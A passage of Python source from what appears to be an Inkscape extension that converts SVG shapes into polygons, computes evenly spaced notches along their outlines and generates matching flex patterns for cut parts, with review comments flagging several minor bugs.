    self.DebugMsg("After parsePath in getPathVertices, len="+str(len(simple_path))+"\n")
    self.DebugMsg(" Path = "+str(simple_path)+'\n')
    # Get a cubic super path
    cubic_super_path = CubicSuperPath(simple_path)
    if (not cubic_super_path) or (len(cubic_super_path) == 0):
        # Probably never happens, but...
        return None
    self.DebugMsg("After CubicSuperPath in getPathVertices, len="+str(len(cubic_super_path))+"\n")
    # Now traverse the cubic super path
    subpath_list = []
    subpath_vertices = []
    # NOTE(review): index_sp is used in the debug message below but never
    # incremented, so it always reports 0.
    index_sp = 0
    for sp in cubic_super_path:
        # We've started a new subpath
        # See if there is a prior subpath and whether we should keep it
        self.DebugMsg("Processing SubPath"+str(index_sp)+" SubPath List len="+str(len(subpath_list))+" Vertices list length="+str(len(subpath_vertices)) +"\n")
        if len(subpath_vertices):
            subpath_list.append(subpath_vertices)
        subpath_vertices = []
        self.DebugMsg("Before subdivideCubicPath len="+str(len(sp)) +"\n")
        self.DebugMsg(" Bsp="+str(sp)+'\n')
        # Flatten bezier segments to line segments (tolerance 0.1).
        subdivideCubicPath(sp, 0.1)
        self.DebugMsg("After subdivideCubicPath len="+str(len(sp)) +"\n")
        self.DebugMsg(" Asp="+str(sp)+'\n')
        # Note the first point of the subpath
        first_point = sp[0][1]
        subpath_vertices.append(first_point)
        sp_xmin = first_point[0]
        sp_xmax = first_point[0]
        sp_ymin = first_point[1]
        sp_ymax = first_point[1]
        n = len(sp)
        # Traverse each point of the subpath
        for csp in sp[1:n]:
            # Append the vertex to our list of vertices
            pt = csp[1]
            subpath_vertices.append(pt)
            #self.DebugMsg("Append subpath_vertice '"+str(pt)+"len="+str(len(subpath_vertices)) +"\n")
            # Track the bounding box of this subpath
            if pt[0] < sp_xmin:
                sp_xmin = pt[0]
            elif pt[0] > sp_xmax:
                sp_xmax = pt[0]
            if pt[1] < sp_ymin:
                sp_ymin = pt[1]
            elif pt[1] > sp_ymax:
                sp_ymax = pt[1]
        # Track the bounding box of the overall drawing
        # This is used for centering the polygons in OpenSCAD around the (x,y) origin
        if sp_xmin < self.xmin:
            self.xmin = sp_xmin
        if sp_xmax > self.xmax:
            self.xmax = sp_xmax
        if sp_ymin < self.ymin:
            self.ymin = sp_ymin
        if sp_ymax > self.ymax:
            self.ymax = sp_ymax
    # Handle the final subpath
    if len(subpath_vertices):
        subpath_list.append(subpath_vertices)
    if len(subpath_list) > 0:
        self.paths[node] = subpath_list
    '''
    self.DebugMsg("After getPathVertices\n")
    index_i = 0
    for i in self.paths[node]:
        index_j = 0
        for j in i:
            self.DebugMsg('Path '+str(index_i)+" élément "+str(index_j)+" = "+str(j)+'\n')
            index_j += 1
        index_i += 1
    '''
def DistanceOnPath(self, p, pt, index):
    '''
    Return (before, after): the polyline length of p before and after the
    point pt, where pt lies on segment *index* of p, i.e. between
    p[index] and p[index+1].
    '''
    # Length of the whole segments up to p[index].
    before = sum(
        distance2points(p[k+1][0], p[k+1][1], p[k][0], p[k][1])
        for k in range(index))
    # Plus the partial segment from p[index] to pt.
    before += distance2points(pt[0], pt[1], p[index][0], p[index][1])
    # Partial segment from pt to p[index+1] ...
    after = distance2points(pt[0], pt[1], p[index+1][0], p[index+1][1])
    # ... plus the remaining whole segments after p[index+1].
    after += sum(
        distance2points(p[k+1][0], p[k+1][1], p[k][0], p[k][1])
        for k in range(index + 1, len(p) - 1))
    return (before, after)
# Compute position of next notch.
# Next notch will be on the path p, and at a distance notch_size from previous point
# Return new index in path p
def compute_next_notch(self, notch_points, p, Angles_p, last_index_in_p, notch_size):
    '''
    Append the next notch position to notch_points and return the updated
    segment index in p. The spacing is notch_size plus a correction
    proportional to the accumulated turn angle (DeltaAngle * thickness / 2)
    so notches stay evenly spaced on curved sections.
    '''
    index_notch = len(notch_points)
    # Coordinates of last notch
    Ox = notch_points[index_notch - 1][0]
    Oy = notch_points[index_notch - 1][1]
    CurAngle = Angles_p[last_index_in_p-1]
    #self.DebugMsg("Enter cnn:last_index_in_p="+str(last_index_in_p)+" CurAngle="+str(round(CurAngle*180/math.pi))+" Segment="+str((p[last_index_in_p-1], p[last_index_in_p]))+" Length="+str(distance2points(p[last_index_in_p-1][0], p[last_index_in_p-1][1], p[last_index_in_p][0], p[last_index_in_p][1]))+"\n")
    DeltaAngle = 0
    # Walk along the polygon until the (angle-corrected) notch distance
    # is reached, accumulating the absolute turn angle on the way.
    while last_index_in_p < (len(p) - 1) and distance2points(Ox, Oy, p[last_index_in_p][0], p[last_index_in_p][1]) < notch_size + DeltaAngle*self.thickness/2.0:
        Diff_angle = Angles_p[last_index_in_p] - CurAngle
        # Normalise the angle difference into [-pi, pi].
        if Diff_angle > math.pi:
            Diff_angle -= 2*math.pi
        elif Diff_angle < -math.pi:
            Diff_angle += 2*math.pi
        Diff_angle = abs(Diff_angle)
        DeltaAngle += Diff_angle
        CurAngle = Angles_p[last_index_in_p]
        #self.DebugMsg("cnn:last_index_in_p="+str(last_index_in_p)+" Angle="+str(round(Angles_p[last_index_in_p]*180/math.pi))+" Diff_angle="+str(round(Diff_angle*180/math.pi))+" DeltaAngle="+str(round(DeltaAngle*180/math.pi))+" Distance="+str(distance2points(Ox, Oy, p[last_index_in_p][0], p[last_index_in_p][1]))+"/"+str(notch_size + DeltaAngle*self.thickness/2.0)+"\n")
        last_index_in_p += 1 # Go to next point in polygon
    # Starting point for the line x0, y0 is p[last_index_in_p-1]
    x0 = p[last_index_in_p-1][0]
    y0 = p[last_index_in_p-1][1]
    # End point for the line x1, y1 is p[last_index_in_p]
    x1 = p[last_index_in_p][0]
    y1 = p[last_index_in_p][1]
    Distance_notch = notch_size + DeltaAngle*self.thickness/2.0
    #self.DebugMsg("  compute_next_notch("+str(index_notch)+") Use Segment="+str(last_index_in_p)+" DeltaAngle="+str(round(DeltaAngle*180/math.pi))+"°, notch_size="+str(notch_size)+" Distance_notch="+str(Distance_notch)+'\n')
    # The actual notch position will be on the line between last_index_in_p-1 and last_index_in_p and at a distance Distance_notch of Ox,Oy
    # The intersection of a line and a circle could be computed as a second degree equation in a general case
    # Specific case, when segment is vertical
    if abs(x1-x0) <0.001:
        # easy case, x= x0 so y = sqrt(d2 - x*x)
        solx1 = x0
        solx2 = x0
        soly1 = Oy + math.sqrt(Distance_notch**2 - (x0 - Ox)**2)
        soly2 = Oy - math.sqrt(Distance_notch**2 - (x0 - Ox)**2)
    else:
        Slope = (y1 - y0) / (x1 - x0)
        # The actual notch position will be on the line between last_index_in_p-1 and last_index_in_p and at a distance notch size of Ox,Oy
        # The intersection of a line and a circle could be computed as a second degree equation
        # The coefficients of this equation are computed below
        a = 1.0 + Slope**2
        b = 2*Slope*y0 - 2*Slope**2*x0 - 2*Ox - 2*Slope*Oy
        c = Slope**2*x0**2 + y0**2 -2*Slope*x0*y0 + 2*Slope*x0*Oy - 2*y0*Oy + Ox**2 + Oy**2 - Distance_notch**2
        solx1, solx2 = Solve2nd(a, b, c)
        soly1 = y0 + Slope*(solx1-x0)
        soly2 = y0 + Slope*(solx2-x0)
    # Now keep the point which is between (x0,y0) and (x1, y1)
    # The distance between (x1,y1) and the "good" solution will be lower than the distance between (x0,y0) and (x1,y1)
    distance1 = distance2points(x1, y1, solx1, soly1)
    distance2 = distance2points(x1, y1, solx2, soly2)
    if distance1 < distance2:
        #Keep solx1
        solx = solx1
        soly = soly1
    else:
        #Keep solx2
        solx = solx2
        soly = soly2
    # Record the notch with the index of the segment it lies on.
    notch_points.append((solx, soly, last_index_in_p-1))
    if abs(distance2points(solx, soly, Ox, Oy) - Distance_notch) > 1:
        #Problem
        self.DebugMsg("Problem in compute_next_notch: x0,y0 ="+str((x0,y0))+" x1,y1="+str((x1,y1))+'\n')
        self.DebugMsg("Len(p)="+str(len(p))+'\n')
        # NOTE(review): Slope is undefined here when the vertical-segment
        # branch was taken (abs(x1-x0) < 0.001) — this line would raise
        # NameError in that case.
        self.DebugMsg("Slope="+str(Slope)+'\n')
        self.DebugMsg("solx1="+str(solx1)+" soly1="+str(soly1)+" soly1="+str(solx2)+" soly1="+str(soly2)+'\n')
        self.DebugMsg(str(index_notch)+": Adding new point ("+str(solx)+","+ str(soly) + "), distance is "+ str(distance2points(solx, soly, Ox, Oy))+ " New index in path :"+str(last_index_in_p)+'\n')
    #self.DebugMsg(str(index_notch)+": Adding new point ("+str(solx)+","+ str(soly) + "), distance is "+ str(distance2points(solx, soly, Ox, Oy))+ " New index in path :"+str(last_index_in_p)+'\n')
    return last_index_in_p
def DrawPoly(self, p, parent):
    """
    Draw polygon p as a plain SVG path inside a new group under parent.

    :param p: list of (x, y) vertices; the path starts at p[0] and draws a
              straight segment to each following vertex.
    :param parent: XML element the new <g> group is appended to.
    """
    group = etree.SubElement(parent, 'g')
    # The offset places the drawing to the left of the original bounding box.
    Newpath = inkcape_draw_cartesian((self.xmin - self.xmax - 10, 0), group)
    self.DebugMsg('DrawPoly First element (0) : '+str(p[0])+ ' Call MoveTo('+ str(p[0][0])+','+str(p[0][1])+'\n')
    Newpath.MoveTo(p[0][0], p[0][1])
    # Straight line to every remaining vertex.
    # (Removed an unused index counter and an unnecessary len() bound from the original loop.)
    for point in p[1:]:
        Newpath.LineTo(point[0], point[1])
    Newpath.GenPath()
def Simplify(self, poly, max_error):
    '''
    Simplify the polygon, remove vertices which are aligned or too close from others
    The parameter gives the max error; below this threshold, points will be removed.
    Return the simplified polygon, which is modified in place.

    :param poly: list of vertices; first and last vertex are expected to be equal (closed polygon)
    :param max_error: maximum allowed distance between a removed vertex and the simplified edge
    '''
    #First point
    LastIdx = 0
    limit = max_error * max_error #Square because distance will be square !
    i = 1
    while i < len(poly)-1:
        #Build segment between Vertex[LastIdx] and Vertex[i+1]
        Seg = Segment(poly[LastIdx], poly[i+1])
        #self.DebugMsg("Pt["+str(i)+"]/"+str(len(poly))+" ="+str(poly[i])+" Segment="+str(Seg)+"\n")
        # Compute square of distance between Vertex[i] and Segment
        dis_square = Seg.square_line_distance(poly[i])
        # BUG FIX: compare the squared distance against the squared threshold.
        # The original compared dis_square with max_error itself, making the
        # effective threshold sqrt(max_error) instead of max_error (the 'limit'
        # variable was computed for exactly this purpose but never used).
        if dis_square < limit:
            # Too close, remove this point
            poly.pop(i) #and do NOT increment index
        else:
            LastIdx = i
            i += 1 #Increment index
    # No need to process last point, it should NOT be modified and stay equal to first one
    return poly
def MakePolyCCW(self, p):
    '''
    Ensure polygon p is oriented counter clockwise.
    Orientation is decided from the signed (doubled) shoelace area over
    consecutive vertex pairs: a positive value means the polygon is already
    CCW; a negative value means clockwise, in which case the vertex list is
    reversed in place. The (possibly reversed) list is returned.
    '''
    area = sum(a[0] * b[1] - b[0] * a[1] for a, b in zip(p, p[1:]))
    self.DebugMsg("poly area = "+str(area/2)+"\n")
    if area < 0:
        # Negative signed area: clockwise orientation, so flip the winding.
        p.reverse()
        self.DebugMsg("Polygon was clockwise, reverse it\n")
    return p
def ComputeAngles(self, p):
    '''
    Return the list of absolute edge angles of polygon p.
    Entry i is the direction (atan2, in radians) of the edge from p[i] to p[i+1].
    '''
    angles = [math.atan2(b[1] - a[1], b[0] - a[0]) for a, b in zip(p, p[1:])]
    # The angle of the last vertex is undefined (Pt n-1 == Pt 0 for a closed
    # polygon), so duplicate the first edge angle to keep the list aligned with p.
    angles.append(angles[0])
    return angles
def writeModifiedPath(self, node, parent):
    '''
    Take the paths (polygons) computed from previous step and generate
    1) The input path with notches
    2) The flex structure associated with the path with notches (same length and number of notches)

    :param node: key into self.paths identifying the list of polygons to process
    :param parent: SVG element receiving the generated groups (outline with notches, start line, flex)
    '''
    path = self.paths[node]
    if (path is None) or (len(path) == 0):
        return
    self.DebugMsg('Enter writeModifiedPath, node='+str(node)+' '+str(len(path))+' paths, global Offset'+str((self.xmin - self.xmax - 10, 0))+'\n')
    # First, if there are several paths, checks if one path is included in the first one.
    # If not exchange such as the first one is the bigger one.
    # All paths which are not the first one will have notches reverted to be outside the polygon instead of inside the polygon.
    # On the finbal paths, these notches will always be inside the form.
    if len(path) > 1:
        OrderPathModified = True
        # Arrange paths such as greater one is first, all others
        # Bubble the enclosing polygon to position 0; repeat until stable.
        while OrderPathModified:
            OrderPathModified = False
            for i in range(1, len(path)):
                if polyInPoly(path[i], None, path[0], None):
                    self.DebugMsg("Path "+str(i)+" is included in path 0\n")
                elif polyInPoly(path[0], None, path[i], None):
                    self.DebugMsg("Path "+str(i)+" contains path 0, exchange\n")
                    path[0], path[i] = path[i], path[0]
                    OrderPathModified = True
    index_path = 0
    # Offsets used to place the generated flex band away from the source drawing.
    xFlexOffset = self.xmin - 2*self.xmax - 20
    yFlexOffset = self.height - self.ymax - 10
    for p in path:
        self.DebugMsg('Processing Path, '+str(index_path)+" Len(path)="+str(len(p))+'\n')
        self.DebugMsg('p='+str(p)+'\n')
        reverse_notch = False
        if index_path > 0 and polyInPoly(p, None, path[0], None):
            reverse_notch = True # For included path, reverse notches
        #Simplify path, remove unnecessary vertices
        p = self.Simplify(p, 0.1)
        self.DebugMsg("---After simplification, path has "+str(len(p))+" vertices\n")
        #Ensure that polygon is counter clockwise
        p = self.MakePolyCCW(p)
        self.DrawPoly(p, parent)
        #Now compute path length. Path length is the sum of length of edges
        length_path = 0
        n = len(p)
        index = 1
        while index < n:
            length_path += math.hypot((p[index][0] - p[index-1][0]), (p[index][1] - p[index-1][1]))
            index += 1
        angles = self.ComputeAngles(p)
        # compute the sum of angles difference and check that it is 2*pi
        SumAngle = 0.0
        for i in range(len(p)-1):
            Delta_angle = angles[i+1] - angles[i]
            # Normalize the turn into [-pi, pi] before taking its magnitude.
            if Delta_angle > math.pi:
                Delta_angle -= 2*math.pi
            elif Delta_angle < -math.pi:
                Delta_angle += 2*math.pi
            Delta_angle = abs(Delta_angle)
            self.DebugMsg("idx="+str(i)+" Angle1 ="+str(round(angles[i]*180/math.pi,3))+" Angle 2="+str(round(angles[i+1]*180/math.pi,3))+" Delta angle="+str(round(Delta_angle*180/math.pi, 3))+"°\n")
            SumAngle += Delta_angle
        self.DebugMsg("Sum of angles="+str(SumAngle*180/math.pi)+"°\n")
        # Flex length will be path length - thickness*SumAngle/2 to keep flex aligned on the shortest path
        flex_length = length_path - self.thickness*SumAngle/2
        self.DebugMsg('Path length ='+str(length_path)+" Flex length ="+str(flex_length)+" Difference="+str(length_path-flex_length)+'\n')
        #Default notch size is notchesInterval + 2mm
        #Actual notch size will be adjusted to match the length
        notch_number = int(round(flex_length / (self.notchesInterval + 2), 0))
        notch_size = flex_length / notch_number
        self.DebugMsg('Number of notches ='+str(notch_number)+' ideal notch size =' + str(round(notch_size,3)) +'\n')
        # Compute position of the points on the path that will become notches
        # Starting at 0, each point will be at distance actual_notch_size from the previous one, at least on one side of the notch (the one with the smallest distance)
        # On the path (middle line) the actual distance will be notch_size + thickness*delta_angle/2 where delta angle is the difference between the angle at starting point and end point
        # As notches are not aligned to vertices, the actual length of the path will be different from the computed one (lower in fact)
        # To avoid a last notch too small, we will repeat the process until the size of the last notch is OK (less than .1mm error)
        # Use an algorithm which corrects the notch_size by computing previous length of the last notch
        nb_try = 0
        size_last_notch = 0
        oldSize = 0
        BestDifference = 9999999
        BestNotchSize = notch_size
        mode_linear = False
        delta_notch = -0.01 #In most cases, should reduce notch size
        while nb_try < 100:
            notch_points = [ (p[0][0], p[0][1], 0) ] # Build a list of tuples with corrdinates (x,y) and offset within polygon which is 0 the the starting point
            index = 1 # Notch index
            last_index_in_p = 1 # Start at 1, index 0 is the current one
            self.DebugMsg("Pass "+str(nb_try)+" First point ("+str(p[0][0])+","+ str(p[0][1]) + ' notch_size='+str(notch_size)+'\n')
            while index < notch_number:
                #Compute next notch point and append it to the list
                last_index_in_p = self.compute_next_notch(notch_points, p, angles, last_index_in_p, notch_size)
                #before, after = self.DistanceOnPath(p, notch_points[index], last_index_in_p-1)
                #self.DebugMsg("     Notch "+str(index)+" placed in "+str(notch_points[index])+" distance before ="+str(before)+" after="+str(after)+" total="+str(before+after)+'\n')
                index += 1
            size_last_notch = distance2points(p[n-1][0], p[n-1][1], notch_points[index-1][0], notch_points[index-1][1])
            self.DebugMsg("Last notch size :"+str(size_last_notch)+'\n')
            if abs(notch_size - size_last_notch) < BestDifference:
                BestNotchSize = notch_size
                BestDifference = abs(notch_size - size_last_notch)
            if abs(notch_size - size_last_notch) <= 0.1:
                break
            # Change size_notch, cut small part in each notch
            # The 0.5 factor is used to avoid non convergent series (too short then too long...)
            if mode_linear:
                # Linear search: keep walking notch_size by delta_notch, shrinking
                # the step sharply whenever it overshoots in the wrong direction.
                if notch_size > size_last_notch and delta_notch > 0:
                    delta_notch -= delta_notch*0.99
                elif notch_size < size_last_notch and delta_notch < 0:
                    delta_notch -= delta_notch*0.99
                notch_size += delta_notch
                self.DebugMsg("Linear mode, changing delta_notch size :"+str(delta_notch)+" --> notch_size="+str(notch_size)+'\n')
            else:
                # Bisection-like phase: halve and reverse the step on overshoot;
                # switch to the linear phase once the step gets very small.
                if notch_size > size_last_notch and delta_notch > 0:
                    delta_notch = -0.5*delta_notch
                    self.DebugMsg("Changing delta_notch size :"+str(delta_notch)+'\n')
                elif notch_size < size_last_notch and delta_notch < 0:
                    delta_notch = -0.5*delta_notch
                    self.DebugMsg("Changing delta_notch size :"+str(delta_notch)+'\n')
                notch_size += delta_notch
                if abs(delta_notch) < 0.002:
                    mode_linear = True
            # Change size_notch, cut small part in each notch
            oldSize = notch_size
            # The 0.5 factor is used to avoid non convergent series (too short then too long...)
            # NOTE(review): this proportional correction is applied IN ADDITION to the
            # delta_notch adjustment above — it looks like a leftover from an earlier
            # version of the algorithm; confirm it is intentional.
            notch_size -= 0.5*(notch_size - size_last_notch)/notch_number
            nb_try += 1
        if nb_try >= 100:
            self.DebugMsg("Algorithm doesn't converge, use best results :"+str(BestNotchSize)+" which gave last notch size difference "+str(BestDifference)+'\n')
            notch_size = BestNotchSize
        # Now draw the actual notches
        group = etree.SubElement(parent, 'g')
        # First draw a start line which will help to position flex.
        Startpath = inkcape_draw_cartesian(((self.xmin - self.xmax - 10), 0), group)
        index_in_p = notch_points[0][2]
        AngleSlope = math.atan2(p[index_in_p+1][1] - p[index_in_p][1], p[index_in_p+1][0] - p[index_in_p][0])
        #Now compute both ends of the notch,
        AngleOrtho = AngleSlope + math.pi/2
        Line_Start = (notch_points[0][0] + self.thickness/2*math.cos(AngleOrtho), notch_points[0][1] + self.thickness/2*math.sin(AngleOrtho))
        Line_End = (notch_points[0][0] - self.thickness/2*math.cos(AngleOrtho), notch_points[0][1] - self.thickness/2*math.sin(AngleOrtho))
        self.DebugMsg("Start line Start"+str(Line_Start)+" End("+str(Line_End)+" Start inside "+str(pointInPoly(Line_Start, p))+ " End inside :"+str(pointInPoly(Line_End, p))+'\n')
        #Notch End should be inside the path and Notch Start outside... If not reverse
        if pointInPoly(Line_Start, p):
            Line_Start, Line_End = Line_End, Line_Start
            AngleOrtho += math.pi
        elif not pointInPoly(Line_End, p):
            #Specific case, neither one is in Polygon (Open path ?), take the lowest Y as Line_End
            # NOTE(review): mixed indices — compares Line_End[1] (Y) with Line_Start[0] (X);
            # looks like Line_Start[1] was intended. Confirm before changing.
            if Line_End[1] > Line_Start[0]:
                Line_Start, Line_End = Line_End, Line_Start
                AngleOrtho += math.pi
        #Now compute a new Start, inside the polygon Start = 3*End - 2*Start
        newLine_Start = (3*Line_End[0] - 2*Line_Start[0], 3*Line_End[1] - 2*Line_Start[1])
        Startpath.MoveTo(newLine_Start[0], newLine_Start[1])
        Startpath.LineTo(Line_End[0], Line_End[1])
        self.DebugMsg("Draw StartLine start from "+str((newLine_Start[0], newLine_Start[1]))+" to "+str((Line_End[0], Line_End[1]))+'\n')
        Startpath.GenPathStart()
        #Then draw the notches
        Newpath = inkcape_draw_cartesian(((self.xmin - self.xmax - 10), 0), group)
        self.DebugMsg("Generate path with "+str(notch_number)+" notches, offset ="+str(((self.xmin - self.xmax - 10), 0))+'\n')
        isClosed = distance2points(p[n-1][0], p[n-1][1], p[0][0], p[0][1]) < 0.1
        # Each notch is a tuple with (X, Y, index_in_p). index_in_p will be used to compute slope of line of the notch
        # The notch will be thickness long, and there will be a part 'inside' the path and a part 'outside' the path
        # The longest part will be outside
        index = 0
        NX0 = 0
        NX1 = 0
        NX2 = 0
        NX3 = 0
        NY0 = 0
        NY1 = 0
        NY2 = 0
        NY3 = 0
        N_Angle = 0
        Notch_Pos = []
        while index < notch_number:
            # Line slope of the path at notch point is
            index_in_p = notch_points[index][2]
            N_Angle = angles[index_in_p]
            AngleSlope = math.atan2(p[index_in_p+1][1] - p[index_in_p][1], p[index_in_p+1][0] - p[index_in_p][0])
            self.DebugMsg("Draw notch "+str(index)+" Slope is "+str(AngleSlope*180/math.pi)+'\n')
            self.DebugMsg("Ref="+str(notch_points[index])+'\n')
            self.DebugMsg("Path points:"+str((p[index_in_p][0], p[index_in_p][1]))+', '+ str((p[index_in_p+1][0], p[index_in_p+1][1]))+'\n')
            #Now compute both ends of the notch,
            AngleOrtho = AngleSlope + math.pi/2
            Notch_Start = (notch_points[index][0] + self.thickness/2*math.cos(AngleOrtho), notch_points[index][1] + self.thickness/2*math.sin(AngleOrtho))
            Notch_End = (notch_points[index][0] - self.thickness/2*math.cos(AngleOrtho), notch_points[index][1] - self.thickness/2*math.sin(AngleOrtho))
            self.DebugMsg("Notch "+str(index)+": Start"+str(Notch_Start)+" End("+str(Notch_End)+" Start inside "+str(pointInPoly(Notch_Start, p))+ " End inside :"+str(pointInPoly(Notch_End, p))+'\n')
            #Notch End should be inside the path and Notch Start outside... If not reverse
            if pointInPoly(Notch_Start, p):
                Notch_Start, Notch_End = Notch_End, Notch_Start
                AngleOrtho += math.pi
            elif not pointInPoly(Notch_End, p):
                #Specific case, neither one is in Polygon (Open path ?), take the lowest Y as Notch_End
                # NOTE(review): same suspicious index mix as the start line above
                # (Notch_End[1] vs Notch_Start[0]); confirm intent.
                if Notch_End[1] > Notch_Start[0]:
                    Notch_Start, Notch_End = Notch_End, Notch_Start
                    AngleOrtho += math.pi
            #if should reverse notches, do it now
            if reverse_notch:
                Notch_Start, Notch_End = Notch_End, Notch_Start
                AngleOrtho += math.pi
            if AngleOrtho > 2*math.pi:
                AngleOrtho -= 2*math.pi
            ln = 2.0
            if index == 0:
                Newpath.MoveTo(Notch_Start[0], Notch_Start[1])
                first = (Notch_Start[0], Notch_Start[1])
                if not isClosed:
                    ln = 1.0 # Actual, different Notch size for the first one when open path
            else:
                Newpath.LineTo(Notch_Start[0], Notch_Start[1])
                if not isClosed and index == notch_number - 1:
                    ln = 1.0
                self.DebugMsg("LineTo starting point from :"+str((x,y))+" to "+str((Notch_Start[0], Notch_Start[1]))+" Length ="+str(distance2points(x, y, Notch_Start[0], Notch_Start[1]))+'\n')
            Newpath.LineTo(Notch_End[0], Notch_End[1])
            NX0 = Notch_Start[0]
            NY0 = Notch_Start[1]
            NX1 = Notch_End[0]
            NY1 = Notch_End[1]
            self.DebugMsg("Draw notch_1 start from "+str((Notch_Start[0], Notch_Start[1]))+" to "+str((Notch_End[0], Notch_End[1]))+'Center is '+str(((Notch_Start[0]+Notch_End[0])/2, (Notch_Start[1]+Notch_End[1])/2))+'\n')
            #Now draw a line parallel to the path, which is notch_size*(2/(notchesInterval+2)) long. Internal part of the notch
            x = Notch_End[0] + (notch_size*ln)/(self.notchesInterval+ln)*math.cos(AngleSlope)
            y = Notch_End[1] + (notch_size*ln)/(self.notchesInterval+ln)*math.sin(AngleSlope)
            Newpath.LineTo(x, y)
            NX2 = x
            NY2 = y
            self.DebugMsg("Draw notch_2 to "+str((x, y))+'\n')
            #Then a line orthogonal, which is thickness long, reverse from first one
            x = x + self.thickness*math.cos(AngleOrtho)
            y = y + self.thickness*math.sin(AngleOrtho)
            Newpath.LineTo(x, y)
            NX3 = x
            NY3 = y
            self.DebugMsg("Draw notch_3 to "+str((x, y))+'\n')
            Notch_Pos.append((NX0, NY0, NX1, NY1, NX2, NY2, NX3, NY3, N_Angle))
            # No need to draw the last segment, it will be drawn when starting the next notch
            index += 1
        #And the last one if the path is closed
        if isClosed:
            self.DebugMsg("Path is closed, draw line to start point "+str((p[0][0], p[0][1]))+'\n')
            Newpath.LineTo(first[0], first[1])
        else:
            self.DebugMsg("Path is open\n")
        Newpath.GenPath()
        # Analyze notches for debugging purpose
        for i in range(len(Notch_Pos)):
            self.DebugMsg("Notch "+str(i)+" Pos="+str(Notch_Pos[i])+" Angle="+str(round(Notch_Pos[i][8]*180/math.pi))+"\n")
            if (i > 0):
                self.DebugMsg("   FromLast Notch N3-N0="+str(distance2points(Notch_Pos[i-1][6], Notch_Pos[i-1][7], Notch_Pos[i][0], Notch_Pos[i][1]))+"\n")
            self.DebugMsg("   Distances: N0-N3="+str(distance2points(Notch_Pos[i][0], Notch_Pos[i][1], Notch_Pos[i][6], Notch_Pos[i][7]))+" N1-N2="+str(distance2points(Notch_Pos[i][2], Notch_Pos[i][3], Notch_Pos[i][4], Notch_Pos[i][5]))+"\n")
        # For each notch determine if we need flex or not. Flex is only needed if there is some curves
        # So if notch[i]-1 notch[i] notch[i+1] are aligned, no need to generate flex in i-1 and i
        for index in range(notch_number):
            self.flexnotch.append(1) # By default all notches need flex
        index = 1
        while index < notch_number-1:
            # Cross-product collinearity test on three consecutive notch points.
            det = (notch_points[index+1][0]- notch_points[index-1][0])*(notch_points[index][1] - notch_points[index-1][1]) - (notch_points[index+1][1] - notch_points[index-1][1])*(notch_points[index][0] - notch_points[index-1][0])
            self.DebugMsg("Notch "+str(index)+": det="+str(det))
            if abs(det) < 0.1: # My threhold to be adjusted
                self.flexnotch[index-1] = 0 # No need for flex for this one and the following
                self.flexnotch[index] = 0
                self.DebugMsg(" no flex in notch "+str(index-1)+" and "+str(index))
            index += 1
            self.DebugMsg("\n")
        # For the last one try notch_number - 2, notch_number - 1 and 0
        det = (notch_points[0][0]- notch_points[notch_number - 2][0])*(notch_points[notch_number - 1][1] - notch_points[notch_number - 2][1]) - (notch_points[0][1] - notch_points[notch_number - 2][1])*(notch_points[notch_number - 1][0] - notch_points[notch_number - 2][0])
        if abs(det) < 0.1: # My threhold to be adjusted
            self.flexnotch[notch_number-2] = 0 # No need for flex for this one and the following
            self.flexnotch[notch_number-1] = 0
        # and the first one with notch_number - 1, 0 and 1
        det = (notch_points[1][0]- notch_points[notch_number-1][0])*(notch_points[0][1] - notch_points[notch_number-1][1]) - (notch_points[1][1] - notch_points[notch_number-1][1])*(notch_points[0][0] - notch_points[notch_number-1][0])
        if abs(det) < 0.1: # My threhold to be adjusted
            self.flexnotch[notch_number-1] = 0 # No need for flex for this one and the following
            self.flexnotch[0] = 0
        self.DebugMsg("FlexNotch ="+str(self.flexnotch)+"\n")
        # Generate Associated flex
        self.GenFlex(parent, notch_number, notch_size, xFlexOffset, yFlexOffset)
        yFlexOffset -= self.height + 10
        index_path += 1
def recursivelyTraverseSvg(self, aNodeList):
    '''
    [ This too is largely lifted from eggbot.py and path2openscad.py ]
    Recursively walk the SVG document, building polygon vertex lists
    for each graphical element we support.
    Rendered SVG elements:
    <circle>, <ellipse>, <line>, <path>, <polygon>, <polyline>, <rect>
    Except for path, all elements are first converted into a path then processed
    Supported SVG elements:
    <group>
    Ignored SVG elements:
    <defs>, <eggbot>, <metadata>, <namedview>, <pattern>,
    processing directives
    All other SVG elements trigger an error (including <text>)

    :param aNodeList: iterable of lxml SVG elements to process
    '''
    for node in aNodeList:
        self.DebugMsg("Node type :" + node.tag + '\n')
        if node.tag == inkex.addNS('g', 'svg') or node.tag == 'g':
            self.DebugMsg("Group detected, recursive call\n")
            self.recursivelyTraverseSvg(node)
        elif node.tag == inkex.addNS('path', 'svg'):
            self.DebugMsg("Path detected, ")
            path_data = node.get('d')
            if path_data:
                self.getPathVertices(path_data, node)
            else:
                self.DebugMsg("NO path data present\n")
        elif node.tag == inkex.addNS('rect', 'svg') or node.tag == 'rect':
            # Create a path with the outline of the rectangle
            x = float(node.get('x'))
            y = float(node.get('y'))
            # NOTE(review): this guard is a no-op ('pass' does not skip the
            # element) and would also trigger for legitimate x == 0 / y == 0;
            # confirm intent before turning it into 'continue'.
            if (not x) or (not y):
                pass
            w = float(node.get('width', '0'))
            h = float(node.get('height', '0'))
            self.DebugMsg('Rectangle X='+ str(x)+',Y='+str(y)+', W='+str(w)+' H='+str(h)+'\n')
            a = []
            a.append(['M', [x, y]])
            a.append(['l', [w, 0]])
            a.append(['l', [0, h]])
            a.append(['l', [-w, 0]])
            a.append(['Z', []])
            self.getPathVertices(str(Path(a)), node)
        elif node.tag == inkex.addNS('line', 'svg') or node.tag == 'line':
            # Convert
            #
            # <line x1="X1" y1="Y1" x2="X2" y2="Y2/>
            #
            # to
            #
            # <path d="MX1,Y1 LX2,Y2"/>
            x1 = float(node.get('x1'))
            y1 = float(node.get('y1'))
            x2 = float(node.get('x2'))
            y2 = float(node.get('y2'))
            self.DebugMsg('Line X1='+ str(x1)+',Y1='+str(y1)+', X2='+str(x2)+' Y2='+str(y2)+'\n')
            # NOTE(review): no-op guard, same remark as for <rect> above.
            if (not x1) or (not y1) or (not x2) or (not y2):
                pass
            a = []
            a.append(['M', [x1, y1]])
            a.append(['L', [x2, y2]])
            self.getPathVertices(str(Path(a)), node)
        elif node.tag == inkex.addNS('polyline', 'svg') or node.tag == 'polyline':
            # Convert
            #
            # <polyline points="x1,y1 x2,y2 x3,y3 [...]"/>
            #
            # to
            #
            # <path d="Mx1,y1 Lx2,y2 Lx3,y3 [...]"/>
            #
            # Note: we ignore polylines with no points
            pl = node.get('points', '').strip()
            # NOTE(review): 'pass' does not actually skip empty polylines as the
            # comment above claims; an empty 'd' string still reaches getPathVertices.
            if pl == '':
                pass
